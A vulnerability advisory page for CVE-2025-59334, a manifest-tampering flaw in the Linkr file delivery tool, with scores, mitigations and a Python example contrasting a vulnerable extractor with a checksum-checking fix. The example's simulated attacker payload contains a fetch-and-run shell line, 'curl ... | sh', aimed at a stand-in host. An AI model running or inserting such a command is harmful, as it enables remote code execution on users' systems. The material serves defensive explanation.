Cyber Posture

CVE-2025-59334

Critical · Public PoC

Published: 16 September 2025
Modified: 08 October 2025
KEV Added: not listed
Patch: 2.0.1
CVSS Score: 9.6 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)
EPSS Score: 0.0017 (37.3rd percentile)
Risk Priority: 19 (weighting: 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2025-59334 is a critical-severity Improper Verification of Cryptographic Signature (CWE-347) vulnerability in Mohammadzain2008 Linkr. Its CVSS base score is 9.6 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Ingress Tool Transfer (T1105). EPSS ranks it at the 37.3rd percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-2 (Flaw Remediation) and SI-7 (Software, Firmware, and Information Integrity).

Threat & Defense at a Glance

What attackers do: exploitation maps to Ingress Tool Transfer (T1105) and Malicious File (T1204.002). What defenders deploy: see the NIST 800-53 controls recommended below.
Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)

[prevent] SI-7 mandates integrity verification of software and information using checksums or digital signatures, directly mitigating the unverified .linkr manifest processing that enables arbitrary file injection.

[prevent] SI-2 requires timely flaw remediation, including patching Linkr to version 2.0.1 or later, which implements the necessary manifest integrity checks.

[prevent, detect] SI-3 deploys malicious code protection mechanisms to scan and block execution of attacker-injected files downloaded via tampered manifests.

MITRE ATT&CK Enterprise Techniques

T1105 Ingress Tool Transfer (tactic: Command and Control)
Adversaries may transfer tools or other files from an external system into a compromised environment.

T1204.002 Malicious File (tactic: Execution)
An adversary may rely upon a user opening a malicious file in order to gain execution.

Why these techniques?

The vulnerability directly enables unauthenticated download of attacker-controlled files via a tampered manifest (T1105) and requires user execution of the resulting malicious payload for RCE impact (T1204.002).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

NVD Description

Linkr is a lightweight file delivery system that downloads files from a webserver. Linkr versions through 2.0.0 do not verify the integrity or authenticity of .linkr manifest files before using their contents, allowing a tampered manifest to inject arbitrary file entries into a package distribution. An attacker can modify a generated .linkr manifest (for example by adding a new entry with a malicious URL) and when a user runs the extract command the client downloads the attacker-supplied file without verification. This enables arbitrary file injection and creates a potential path to remote code execution if a downloaded malicious binary or script is later executed. Version 2.0.1 adds a manifest integrity check that compares the checksum of the original author-created manifest to the one being extracted and aborts on mismatch, warning if no original manifest is hosted. Users should update to 2.0.1 or later. As a workaround prior to updating, use only trusted .linkr manifests, manually verify manifest integrity, and host manifests on trusted servers.

Deeper analysis

CVE-2025-59334 is a vulnerability in Linkr, a lightweight file delivery system that downloads files from a webserver. Versions through 2.0.0 fail to verify the integrity or authenticity of .linkr manifest files before using their contents, enabling a tampered manifest to inject arbitrary file entries into a package distribution. This issue, classified as CWE-347 (Improper Verification of Cryptographic Signature), carries a CVSS v3.1 score of 9.6 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).

An attacker can exploit this by modifying a generated .linkr manifest, such as adding a new entry with a malicious URL. A user who then runs the extract command on the tampered manifest will have the client download the attacker-supplied file without verification. This results in arbitrary file injection and creates a potential path to remote code execution if the downloaded malicious binary or script is subsequently executed. Exploitation requires no privileges but depends on user interaction to process the manifest.

The patch in version 2.0.1 adds a manifest integrity check, comparing the checksum of the original author-created manifest to the one being extracted and aborting on mismatch, while warning if no original manifest is hosted. Users should update to 2.0.1 or later. Workarounds include using only trusted .linkr manifests, manually verifying manifest integrity, and hosting manifests on trusted servers. Details are available in the GitHub security advisory (GHSA-6wph-mpv2-29xv) and commit 182e5ddaa51972e144005b500c4bcebf2fd1a6c0.
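The manifest-tampering flow described in the NVD description and the deeper analysis above, as an added example that is not Linkr's own code: a client that fetches every entry of a .linkr manifest unchecked (the pre-2.0.1 behaviour) beside a client that first compares the SHA-256 of the manifest being extracted with the author-hosted original and aborts on mismatch, as the 2.0.1 fix is described. The JSON manifest layout, the field names, every URL and the in-memory stand-in for the web server are assumptions made for this example; the real Linkr manifest format is not shown on this page.

```python
"""Added illustration of CVE-2025-59334 and of a 2.0.1-style integrity
check. Not Linkr's code: manifest layout, field names, URLs and the
simulated web server below are all assumed for the example."""
import hashlib
import hmac
import json
import warnings
from typing import Dict, Optional

# Constructed sample manifest, as an author would generate it.
AUTHOR_MANIFEST = {
    "package": "demo-app",
    "files": [
        {"path": "bin/demo", "url": "https://author.example/demo"},
        {"path": "README", "url": "https://author.example/README"},
    ],
}
AUTHOR_MANIFEST_BYTES = json.dumps(AUTHOR_MANIFEST, sort_keys=True).encode()
ORIGINAL_URL = "https://author.example/demo.linkr"  # assumed location of the hosted original

# Simulated web server so the example runs offline; keys stand in for URLs.
WEB: Dict[str, bytes] = {
    "https://author.example/demo": b"#!/bin/sh\necho hello\n",
    "https://author.example/README": b"demo package\n",
    ORIGINAL_URL: AUTHOR_MANIFEST_BYTES,
    # Attacker-hosted payload, referenced only by the tampered manifest.
    "https://evil.example/loader": b"#!/bin/sh\ncurl -s evil.example/x | sh\n",
}


def fetch(url: str) -> Optional[bytes]:
    """Stand-in for an HTTP GET against the simulated server."""
    return WEB.get(url)


def tamper(manifest_bytes: bytes) -> bytes:
    """The attacker's edit: append one entry with a malicious URL to a
    generated manifest. Nothing else in the manifest changes."""
    m = json.loads(manifest_bytes)
    m["files"].append({"path": ".profile", "url": "https://evil.example/loader"})
    return json.dumps(m, sort_keys=True).encode()


def extract_vulnerable(manifest_bytes: bytes) -> Dict[str, bytes]:
    """Versions through 2.0.0: every manifest entry is fetched as-is."""
    files: Dict[str, bytes] = {}
    for entry in json.loads(manifest_bytes)["files"]:
        data = fetch(entry["url"])
        if data is not None:
            files[entry["path"]] = data  # the injected entry lands here too
    return files


class ManifestIntegrityError(Exception):
    pass


def extract_checked(manifest_bytes: bytes, original_url: str,
                    strict: bool = False) -> Dict[str, bytes]:
    """2.0.1-style check: hash the manifest being extracted, compare with the
    author-hosted original, abort on mismatch. With no hosted original the
    release only warns (fail-open); strict=True aborts in that case as well."""
    original = fetch(original_url)
    if original is None:
        if strict:
            raise ManifestIntegrityError("no original manifest hosted at " + original_url)
        warnings.warn("no original manifest hosted; manifest integrity not verified")
    else:
        local = hashlib.sha256(manifest_bytes).hexdigest()
        hosted = hashlib.sha256(original).hexdigest()
        if not hmac.compare_digest(local, hosted):
            raise ManifestIntegrityError("manifest checksum mismatch, aborting extract")
    return extract_vulnerable(manifest_bytes)  # entries are trusted only after the check


def is_rejected(manifest_bytes: bytes, original_url: str, strict: bool = False) -> bool:
    """True when the checked extractor refuses to process the manifest."""
    try:
        extract_checked(manifest_bytes, original_url, strict)
    except ManifestIntegrityError:
        return True
    return False


if __name__ == "__main__":
    tampered = tamper(AUTHOR_MANIFEST_BYTES)
    missing = "https://author.example/none.linkr"
    print("vulnerable client wrote:", sorted(extract_vulnerable(tampered)))
    print("checked client rejects tampered manifest:", is_rejected(tampered, ORIGINAL_URL))
    print("no hosted original, non-strict:", is_rejected(tampered, missing))
    print("no hosted original, strict:", is_rejected(tampered, missing, strict=True))
```

Two points the example makes concrete that the prose leaves implicit. First, the check is only as strong as the hosting of the original manifest: an attacker who can replace the hosted original as well, or remove it so that the warn-and-continue path runs, still gets the injected entry downloaded, which is why the example adds a `strict` flag that turns the warning into an abort. Second, a checksum fetched from the author's server is an integrity pin against a tampered copy, not a signature by an author-held key; the workaround on this page (host manifests only on trusted servers and verify them manually) is what makes that pin meaningful.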

Details

CWE(s)

CWE-347 Improper Verification of Cryptographic Signature

Affected Products

mohammadzain2008 linkr ≤ 2.0.0 (fixed in 2.0.1)

CVEs Like This One

CVE-2025-27773 (shared CWE-347)
CVE-2026-5466 (shared CWE-347)
CVE-2026-40372 (shared CWE-347)
CVE-2026-38651 (shared CWE-347)
CVE-2026-34377 (shared CWE-347)
CVE-2026-20997 (shared CWE-347)
CVE-2025-23206 (shared CWE-347)
CVE-2025-52648 (shared CWE-347)
CVE-2026-32614 (shared CWE-347)
CVE-2025-36418 (shared CWE-347)

References

GitHub security advisory GHSA-6wph-mpv2-29xv
Fix commit 182e5ddaa51972e144005b500c4bcebf2fd1a6c0 (adds the manifest integrity check shipped in 2.0.1)